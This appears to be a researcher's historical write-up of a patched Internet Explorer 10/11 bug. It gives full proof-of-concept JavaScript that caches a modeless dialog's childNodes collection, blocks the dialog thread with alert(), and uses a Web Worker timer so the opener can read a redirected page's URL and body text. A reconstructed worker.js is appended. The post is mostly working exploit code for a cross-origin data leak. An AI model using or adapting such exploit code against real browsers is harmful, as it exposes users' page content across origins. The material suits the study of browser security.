This is a refreshed version of the earlier childNodes thread bug, updated to work on IE10 and on the early IE11 builds available at the time. The structure is the same as before: cache the dialog's live childNodes collection, freeze the modeless dialog's thread with an alert, and use a Web Worker to time the access from the opener. The final access was simplified to read the URL and body text of the document the collection now resolves to.
// Worker used only as a timer: it posts back after a delay so the access
// below runs once the dialog has redirected and is blocked in alert().
var thread = new Worker('worker.js');

// Runs on the opener's thread when the worker posts back.
thread.onmessage = function(event) {
    try {
        // First touch of the cached collection: throws because the dialog's
        // original document is gone.
        _childNodes[0].ownerDocument;
    } catch (e) {
        // Second touch succeeds, but the collection now resolves to the
        // redirected document, so its URL and body text are readable here.
        _childNodes[0].ownerDocument.parentWindow.alert(
            _childNodes[0].ownerDocument.URL + "\n" +
            _childNodes[0].ownerDocument.body.innerText
        );
    }
};

function main() {
    // Modeless dialog loading a page (redirect.aspx) that navigates itself away.
    var win = showModelessDialog("redirect.aspx", window,
                                 "dialogwidth=400px;dialogHeight=300px");
    // Evaluated inside the dialog: hand its live childNodes collection back to
    // the opener (dialogArguments is this window), then block the dialog's
    // script thread with an alert so the collection is not released.
    var strCode = 'dialogArguments._childNodes = document.childNodes;' +
                  'alert("Please, don\'t close this alert yet");';
    win.setTimeout(strCode);   // string argument: IE evaluates it in the dialog's window
    // Start the worker's timer; its reply triggers thread.onmessage above.
    thread.postMessage(1);
}
The worker simply waits three seconds after receiving the message and then posts back, which fires the opener's onmessage handler and touches the cached collection. The first access throws; the second succeeds, and the alert shows the redirected page's URL and body text. Tested on IE10 and on IE11 build 20130227-2100.
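The post does not include worker.js itself. The script below is a reconstruction from the description above, added here as an example rather than the original file. It assumes the three-second wait starts when the opener calls thread.postMessage(1) and that the reply payload does not matter (the opener only needs the onmessage event to fire); the scheduling is split into a named function so it can be exercised outside a worker.

```javascript
// worker.js, reconstructed from the post's description (added example, not the
// original file). Assumed: the wait starts on the opener's postMessage(1), and
// the reply value is irrelevant to the opener's handler.
var DELAY_MS = 3000;   // "waits three seconds" per the post

// Arms the delayed reply. postFn and timerFn are injected so the scheduling can
// be exercised outside a worker; in the worker they are postMessage and
// setTimeout. Returns whatever the timer function returns (the timer handle).
function scheduleReply(postFn, timerFn, delay) {
  return timerFn(function () { postFn(1); }, delay);
}

// Worker entry point: on the opener's message, reply after DELAY_MS so the
// opener touches the cached collection only after the dialog has redirected
// and its thread is blocked in alert(). Guarded so the file also loads in a
// non-worker context without a global `self`.
if (typeof self !== 'undefined') {
  self.onmessage = function () {
    scheduleReply(postMessage, setTimeout, DELAY_MS);
  };
}
```

In the worker, the only observable behaviour is the single delayed postMessage; the opener's handler ignores the message content and reads the collection regardless.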
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.